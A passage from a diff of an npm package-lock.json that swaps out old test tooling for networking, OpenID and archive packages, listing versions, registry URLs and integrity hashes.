"version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==" + }, + "ip-address": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-10.0.1.tgz", + "integrity": "sha512-NWv9YLW4PoW2B7xtzaS3NCot75m6nK7Icdv0o3lfMceJVRfSoQwqD4wEH5rLwoKJwUiZ/rfpiVBhnaF0FK4HoA==" + }, + "ip-regex": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-5.0.0.tgz", + "integrity": "sha512-fOCG6lhoKKakwv+C6KdsOnGvgXnmgfmp0myi3bcNwj3qfwPAxRKWEuFhvEFF7ceYIz6+1jRZ+yguLFAmUNPEfw==" + }, + "is-ip": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-5.0.1.tgz", + "integrity": "sha512-FCsGHdlrOnZQcp0+XT5a+pYowf33itBalCl+7ovNXC/7o5BhIpG14M3OrpPPdBSIQJCm+0M5+9mO7S9VVTTCFw==", "requires": { - "escape-string-regexp": "^2.0.0" - }, - "dependencies": { - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - } + "ip-regex": "^5.0.0", + "super-regex": "^0.2.0" } }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" + "is-regexp": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/is-regexp/-/is-regexp-3.1.0.tgz", + "integrity": "sha512-rbku49cWloU5bSMI+zaRaXdQHXnthP6DZ/vLnfdSKyL4zUzuWnomtOEiZZOd+ioQ+avFo/qau3KPTc7Fjy1uPA==" }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, + "isomorphic-ws": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", + "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", + "requires": {} + }, + "jose": { + "version": "6.0.11", + "resolved": "https://registry.npmjs.org/jose/-/jose-6.0.11.tgz", + "integrity": "sha512-QxG7EaliDARm1O1S8BGakqncGT9s25bKL1WSf6/oa17Tkqwi8D2ZNglqCF+DsYF88/rV66Q/Q2mFAy697E1DUg==" + }, + "js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" + "argparse": "^2.0.1" } }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, + "jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" + }, + "jsep": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", + "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" + }, + "jsonpath-plus": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", + "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" + "@jsep-plugin/assignment": "^1.3.0", + "@jsep-plugin/regex": "^1.0.4", + "jsep": "^1.4.0" } }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, + "lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + }, + "matcher": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/matcher/-/matcher-5.0.0.tgz", + "integrity": "sha512-s2EMBOWtXFc8dgqvoAzKJXxNHibcdJMV0gwqKUaw9E2JBJuGUK7DrNKrA6g/i+v72TT16+6sVm5mS3thaMLQUw==", "requires": { - "ansi-regex": "^5.0.1" + "escape-string-regexp": "^5.0.0" } }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true + "math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==" }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true + "mime-db": { + "version": "1.52.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", + "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, + "mime-types": { + "version": "2.1.35", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", + "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { - "has-flag": "^4.0.0" + "mime-db": "1.52.0" } }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true + "ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "mustache": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/mustache/-/mustache-4.2.0.tgz", + "integrity": "sha512-71ippSywq5Yb7/tVYyGbkBggbU8H3u5Rz56fH60jGFgr8uHwxs+aSKeqmluIVzM0m0kB7xQjKS6qPfd0b2ZoqQ==" }, - "tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", + "node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", "requires": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "dependencies": { - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - } + "whatwg-url": "^5.0.0" } }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, + "oauth4webapi": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.5.tgz", + "integrity": "sha512-1K88D2GiAydGblHo39NBro5TebGXa+7tYoyIbxvqv3+haDDry7CBE1eSYuNbOSsYCCU6y0gdynVZAkm4YPw4hg==" + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" + "wrappy": "1" } }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true + "openid-client": { + "version": "6.6.2", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.2.tgz", + "integrity": "sha512-Xya5TNMnnZuTM6DbHdB4q0S3ig2NTAELnii/ASie1xDEr8iiB8zZbO871OWBdrw++sd3hW6bqWjgcmSy1RTWHA==", + "requires": { + "jose": "^6.0.11", + "oauth4webapi": "^3.5.4" + } }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, + "parse-domain": { + "version": "8.2.2", + "resolved": "https://registry.npmjs.org/parse-domain/-/parse-domain-8.2.2.tgz", + "integrity": "sha512-CoksenD3UDqphCHlXIcNh/TX0dsYLHo6dSAUC/QBcJRWJXcV5rc1mwsS4WbhYGu4LD4Uxc0v3ZzGo+OHCGsLcw==", "requires": { - "is-number": "^7.0.0" + "is-ip": "^5.0.1" } }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, - "tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + "rfc4648": { + "version": "1.5.2", + "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", + "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" }, - "ts-jest": { - "version": "29.1.1", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.1.1.tgz", - "integrity": "sha512-D6xjnnbP17cC85nliwGiL+tpoKN0StpgE0TeOjXQTU6MVCfsB4v7aW05CgQ/1OywGb0x/oy9hHFnN+sczTiRaA==", - "dev": true, + "smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==" + }, + "socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", "requires": { - "bs-logger": "0.x", - "fast-json-stable-stringify": "2.x", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "4.x", - "make-error": "1.x", - "semver": "^7.5.3", - "yargs-parser": "^21.0.1" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" }, "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, + "ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", "requires": { - "yallist": "^4.0.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true } } }, - "tslib": { - "version": "2.6.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.0.tgz", - "integrity": "sha512-7At1WUettjcSRHXCyYtTselblcHl9PJFFVKiCAy/bY97+BPZXSQ2wbq0P9s8tK2G7dFQfNnlJnPAiArVBVBsfA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", + "socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", "requires": { - "safe-buffer": "^5.0.1" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" } }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "typescript": { - "version": "4.9.5", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.9.5.tgz", - "integrity": "sha512-1FXk9E2Hm+QzZQ7z+McJiHL4NW1F2EzMu9Nq9i3zAaGqibafqYwCVU6WyWAuyQRRzOlxou8xZSyXLEN8oKj24g==", - "dev": true + "sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==" }, - "undici-types": { - "version": "5.26.5", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", - "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==" + "stream-buffers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", + "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, + "streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" + "bare-events": "^2.2.0", + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" } }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", + "super-regex": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/super-regex/-/super-regex-0.2.0.tgz", + "integrity": "sha512-WZzIx3rC1CvbMDloLsVw0lkZVKJWbrkJ0k1ghKFmcnPrW1+jWbgTkTEWVtD9lMdmI4jZEz40+naBxl1dCUhXXw==", "requires": { - "punycode": "^2.1.0" + "clone-regexp": "^3.0.0", + "function-timeout": "^0.1.0", + "time-span": "^5.1.0" } }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" + "tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", + "requires": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0", + "pump": "^3.0.0", + "tar-stream": "^3.1.5" + } }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, + "tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", + "text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" + "b4a": "^1.6.4" } }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, + "time-span": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/time-span/-/time-span-5.1.0.tgz", + "integrity": "sha512-75voc/9G4rDIJleOo4jPvN4/YC4GRZrY8yy1uU4lwrB3XEQbWve8zXoO5No4eFrGcTAMYyoY67p8jRQdtA1HbA==", "requires": { - "makeerror": "1.0.12" + "convert-hrtime": "^5.0.0" } }, + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "typescript": { + "version": "5.8.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.3.tgz", + "integrity": "sha512-p1diW6TqL9L07nNxvRMM7hMMw4c5XOo/1ibL4aAIGmSAt9slTE1Xgw5KWuof2uTOvCg9BY7ZRi+GaF+7sfgPeQ==", + "dev": true + }, "webidl-conversions": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", @@ -7938,86 +2292,16 @@ "webidl-conversions": "^3.0.0" } }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" }, "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": 